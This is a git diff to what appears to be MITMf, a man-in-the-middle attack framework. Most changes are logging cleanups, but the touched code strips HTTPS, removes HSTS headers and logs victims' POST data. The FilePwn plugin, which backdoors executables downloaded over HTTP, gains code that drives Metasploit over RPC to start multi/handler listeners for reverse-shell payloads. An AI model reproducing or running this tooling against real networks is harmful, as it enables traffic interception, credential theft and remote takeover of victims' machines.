diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index 017118c..a132d2b 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -72,7 +72,7 @@ class ClientRequest(Request): if 'referer' in headers: real = self.urlMonitor.real if len(real) > 0: - dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) + dregex = re.compile("({})".format("|".join(map(re.escape, real.keys())))) headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) if 'if-none-match' in headers: @@ -80,13 +80,13 @@ class ClientRequest(Request): if 'host' in headers: host = self.urlMonitor.URLgetRealHost(str(headers['host'])) - mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host)) + mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host)) headers['host'] = host self.setHeader('Host', host) if 'accept-encoding' in headers: del headers['accept-encoding'] - mitmf_logger.debug("Zapped encoding") + mitmf_logger.debug("[ClientRequest] Zapped encoding") if 'if-modified-since' in headers: del headers['if-modified-since'] @@ -117,7 +117,7 @@ class ClientRequest(Request): return "lock.ico" def handleHostResolvedSuccess(self, address): - mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) + mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address)) host = self.getHeader("host") headers = self.cleanHeaders() client = self.getClientIP() @@ -138,13 +138,13 @@ class ClientRequest(Request): url = 'http://' + host + path self.uri = url # set URI to absolute - if len(real) > 0: - dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) + if real: + dregex = re.compile("({})".format("|".join(map(re.escape, real.keys())))) path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) - if len(patchDict) > 0: - dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) + if patchDict: + dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys())))) postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) @@ -155,22 +155,22 @@ class ClientRequest(Request): self.dnsCache.cacheResolution(hostparts[0], address) if (not self.cookieCleaner.isClean(self.method, client, host, headers)): - mitmf_logger.debug("Sending expired cookies...") + mitmf_logger.debug("[ClientRequest] Sending expired cookies") self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path)) elif (self.urlMonitor.isSecureFavicon(client, path)): - mitmf_logger.debug("Sending spoofed favicon response...") + mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response") self.sendSpoofedFaviconResponse() elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): if 'securelink' in headers: del headers['securelink'] - mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url)) + mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url))) self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url)) else: - mitmf_logger.debug("Sending request via HTTP...") + mitmf_logger.debug("[ClientRequest] Sending request via HTTP") #self.proxyViaHTTP(address, self.method, path, postData, headers) port = 80 if len(hostparts) > 1: @@ -189,7 +189,7 @@ class ClientRequest(Request): address = self.dnsCache.getCachedAddress(host) if address != None: - mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address))) + mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, str(address))) return defer.succeed(address) else: @@ -197,20 +197,22 @@ class ClientRequest(Request): if self.resolver == 'dnschef': try: + mitmf_logger.debug("[ClientRequest] Resolving with DNSChef") address = str(self.customResolver.query(host)[0].address) return defer.succeed(address) except Exception: - return defer.fail() - + mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()") + return reactor.resolve(host) + elif self.resolver == 'twisted': return reactor.resolve(host) def process(self): - mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host'))) + mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host'))) host = self.getHeader('host').split(":")[0] if self.hsts: - host = self.urlMonitor.URLgetRealHost("%s"%host) + host = self.urlMonitor.URLgetRealHost(str(host)) deferred = self.resolveHost(host) deferred.addCallback(self.handleHostResolvedSuccess) diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 72e3205..2ce07ac 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -70,18 +70,18 @@ class ServerConnection(HTTPClient): if self.command == 'GET': try: user_agent = parse(self.headers['user-agent']) - self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) + self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) except: - self.clientInfo = "%s " % self.client.getClientIP() + self.clientInfo = "{} ".format(self.client.getClientIP()) - mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host']) + mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host'])) self.plugins.hook() self.sendCommand(self.command, self.uri) def sendHeaders(self): for header, value in self.headers.iteritems(): - mitmf_logger.debug("Sending header: (%s => %s)" % (header, value)) + mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value)) self.sendHeader(header, value) self.endHeaders() @@ -92,11 +92,11 @@ class ServerConnection(HTTPClient): elif 'keylog' in self.uri: self.plugins.hook() else: - mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) + mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) self.transport.write(self.postData) def connectionMade(self): - mitmf_logger.debug("HTTP connection made.") + mitmf_logger.debug("[ServerConnection] HTTP connection made.") self.plugins.hook() self.sendRequest() self.sendHeaders() @@ -105,11 +105,11 @@ class ServerConnection(HTTPClient): self.sendPostData() def handleStatus(self, version, code, message): - mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message)) + mitmf_logger.debug("[ServerConnection] Got server response: {0} {1} {2}".format(version, code, message)) self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): - mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value)) + mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value)) if (key.lower() == 'location'): value = self.replaceSecureLinks(value) @@ -119,15 +119,15 @@ class ServerConnection(HTTPClient): if (key.lower() == 'content-type'): if (value.find('image') != -1): self.isImageRequest = True - mitmf_logger.debug("Response is image content, not scanning...") + mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...") if (key.lower() == 'content-encoding'): if (value.find('gzip') != -1): - mitmf_logger.debug("Response is compressed...") + mitmf_logger.debug("[ServerConnection] Response is compressed...") self.isCompressed = True elif (key.lower()== 'strict-transport-security'): - mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP()) + mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP())) elif (key.lower() == 'content-length'): self.contentLength = value @@ -164,10 +164,11 @@ class ServerConnection(HTTPClient): def handleResponse(self, data): if (self.isCompressed): - mitmf_logger.debug("Decompressing content...") + mitmf_logger.debug("[ServerConnection] Decompressing content...") data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() #mitmf_logger.debug("Read from server:\n" + data) + mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) data = self.replaceSecureLinks(data) res = self.plugins.hook() @@ -184,7 +185,7 @@ class ServerConnection(HTTPClient): try: self.shutdown() except: - mitmf_logger.info("Client connection dropped before request finished.") + mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.") def replaceSecureLinks(self, data): if self.hsts: @@ -193,7 +194,7 @@ class ServerConnection(HTTPClient): patchDict = self.urlMonitor.patchDict if len(patchDict)>0: - dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) + dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys())))) data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data) iterator = re.finditer(ServerConnection.urlExpression, data) @@ -202,13 +203,13 @@ class ServerConnection(HTTPClient): mitmf_logger.debug("[ServerConnection] Found secure reference: " + url) nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) - mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl)) + mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl)) sustitucion[url] = nuevaurl #data.replace(url,nuevaurl) #data = self.urlMonitor.DataReemplazo(data) if len(sustitucion)>0: - dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys()))) + dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys())))) data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) #mitmf_logger.debug("HSTS DEBUG received data:\n"+data) @@ -227,7 +228,7 @@ class ServerConnection(HTTPClient): for match in iterator: url = match.group() - mitmf_logger.debug("Found secure reference: " + url) + mitmf_logger.debug("[ServerConnection] Found secure reference: " + url) url = url.replace('https://', 'http://', 1) url = url.replace('&', '&') diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 987db4d..ed3e774 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -67,6 +67,7 @@ import multiprocessing from libs.bdfactory import pebin from libs.bdfactory import elfbin from libs.bdfactory import machobin +from core.msfrpc import Msfrpc from plugins.plugin import Plugin from tempfile import mkstemp from configobj import ConfigObj @@ -79,7 +80,7 @@ class FilePwn(Plugin): desc = "Backdoor executables being sent over http using bdfactory" implements = ["handleResponse"] tree_output = ["BDFProxy v0.3.2 online"] - version = "0.2" + version = "0.3" has_opts = False def initialize(self, options): @@ -109,6 +110,20 @@ class FilePwn(Plugin): #NOT USED NOW #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) + #Metasploit options + msfcfg = options.configfile['MITMf']['Metasploit'] + rpcip = msfcfg['rpcip'] + rpcpass = msfcfg['rpcpass'] + + try: + self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary + self.msf.login('msf', rpcpass) + version = self.msf.call('core.version')['version'] + self.tree_output.append("Connected to Metasploit v%s" % version) + except Exception: + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + + #FilePwn options self.userConfig = options.configfile['FilePwn'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] @@ -123,6 +138,32 @@ class FilePwn(Plugin): self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] + self.tree_output.append("Setting up Metasploit payload handlers") + + jobs = self.msf.call('job.list') + for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: + cmd = "use exploit/multi/handler\n" + cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) + cmd += "set LHOST {}\n".format(config["HOST"]) + cmd += "set LPORT {}\n".format(config["PORT"]) + cmd += "exploit -j\n" + + if jobs: + for pid, name in jobs.iteritems(): + info = self.msf.call('job.info', [pid]) + if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): + #Create a virtual console + c_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [c_id, cmd]) + else: + #Create a virtual console + c_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [c_id, cmd]) + def convert_to_Bool(self, aString): if aString.lower() == 'true': return True @@ -300,7 +341,7 @@ class FilePwn(Plugin): except Exception as e: print 'Exception', str(e) - mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e)) + mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) return None def tar_files(self, aTarFileBytes, formatt): diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index f4a0bfb..15a292d 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -18,13 +18,13 @@ # USA # -import core.msfrpc as msfrpc import string import random import threading import sys import logging +from core.msfrpc import Msfrpc from plugins.plugin import Plugin from plugins.BrowserProfiler import BrowserProfiler from time import sleep @@ -71,7 +71,7 @@ class JavaPwn(BrowserProfiler, Plugin): self.black_ips = [] try: - msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary + msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary msf.login('msf', self.rpcpass) version = msf.call('core.version')['version'] self.tree_output.append("Connected to Metasploit v%s" % version) @@ -233,20 +233,3 @@ class JavaPwn(BrowserProfiler, Plugin): self.send_command(cmd, msf, vic_ip) self.injectWait(msf, rand_url, vic_ip) sleep(1) - - def finish(self): - '''This will be called when shutting down''' - msf = msfrpc.Msfrpc({"host": self.rpcip}) - msf.login('msf', self.rpcpass) - - jobs = msf.call('job.list') - if len(jobs) > 0: - print '\n[*] Stopping all running metasploit jobs' - for k, v in jobs.iteritems(): - msf.call('job.stop', [k]) - - consoles = msf.call('console.list')['consoles'] - if len(consoles) > 0: - print "[*] Closing all virtual consoles" - for console in consoles: - msf.call('console.destroy', [console['id']]) diff --git a/requirements.txt b/requirements.txt index 06c30e4..ababa30 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,4 +9,5 @@ configobj pyyaml ua-parser Pillow -pefile \ No newline at end of file +pefile +pypcap \ No newline at end of file